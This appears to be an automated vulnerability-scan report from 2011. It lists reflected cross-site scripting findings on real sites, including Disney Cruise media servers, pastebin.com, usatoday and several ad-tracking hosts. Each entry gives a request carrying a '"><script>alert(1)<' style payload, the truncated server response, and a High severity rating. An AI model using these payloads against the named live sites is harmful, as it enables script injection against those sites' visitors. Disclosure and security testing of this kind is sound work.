GET /media6e20d"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:32 GMT Content-Length: 102701 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/favicon |
GET /media92089"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:34 GMT Content-Length: 32945 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /reservations/concat/2.39 |
GET /55aa9"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:36:08 GMT Content-Length: 33443 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /reservations/concat/2.39 |
GET /15880"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:36:12 GMT Content-Length: 33442 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=20110515192708 Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:37 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:37 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:33:37 GMT Server: lighttpd/1.4.18 Content-Length: 425 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=20110515192708 Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:25 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:25 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:33:25 GMT Server: lighttpd/1.4.18 Content-Length: 395 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fingerhut.tt |
Path: | /m2/fingerhut/mbox |
GET /m2/fingerhut/mbox Host: fingerhut.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 210 Date: Mon, 16 May 2011 01:36:07 GMT Server: Test & Target mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /asp/usatly/handler.ashx |
GET /asp/usatly/handler.ashx Host: i.usatoday.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 138 Content-Type: application/x-javascript; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Cache-Control: private, max-age=86400 Date: Mon, 16 May 2011 01:19:47 GMT Connection: close Vary: Accept-Encoding var usatlyshorturl = 'c5858';alert(1)/ |
Severity: | High |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /gateway/gw.js |
GET /gateway/gw.js?csid Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Mon, 16 May 2011 01:19:40 GMT Cache-Control: max-age=86400, private Expires: Tue, 17 May 2011 01:19:40 GMT X-Proc-ms: 0 Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:19:39 GMT Content-Length: 128 /* * JavaScript include error: * The customer code "E0656072B1B<SCRIPT>ALERT(1)< */ |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /favicon.ico |
GET /favicon.ico50732"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:57 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:57 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 11770 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/fixed.css |
GET /ie6806"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 11775 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/fixed.css |
GET /i/fixed.cssa9ab5"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 11777 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/style.css |
GET /if371c"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 11758 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/style.css |
GET /i/style.cssc0eb9"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:48 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:48 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 11777 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /trends |
GET /trends5ddfb"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 12233 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /trends |
GET /trends?a94d7"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 12237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=ad70c"><script>alert(1)< Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:36 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:22:36 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=4 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:42 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:22:42 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 94 Expires: Mon, 16 May 2011 01:38:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:08 GMT Connection: close X-N: S Unable to find /bluestembrands |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 94 Expires: Mon, 16 May 2011 01:38:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:32 GMT Connection: close X-N: S Unable to find /bluestembrands |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 95 Expires: Mon, 16 May 2011 01:38:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:09 GMT Connection: close X-N: S Unable to find /bluestembrands |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:36:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:56 GMT Connection: close X-N: S Unable to find /bluestembrands/F0042_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:37:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:01 GMT Connection: close X-N: S Unable to find /bluestembrands/F1900_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:36:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:36 GMT Connection: close X-N: S Unable to find /bluestembrands/F1962_VB |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:36:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:54 GMT Connection: close X-N: S Unable to find /bluestembrands/F2553_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 87 Expires: Mon, 16 May 2011 01:38:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:38:37 GMT Connection: close X-N: S Unable to find /bluestembrands/F5676_VA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:27 GMT Connection: close X-N: S Unable to find /bluestembrands/F6580_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:36:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:36:58 GMT Connection: close X-N: S Unable to find /bluestembrands/F8394_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:38 GMT Connection: close X-N: S Unable to find /bluestembrands/NA908_WM1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 88 Expires: Mon, 16 May 2011 01:37:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:37:46 GMT Connection: close X-N: S Unable to find /bluestembrands/NB750_WVA |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
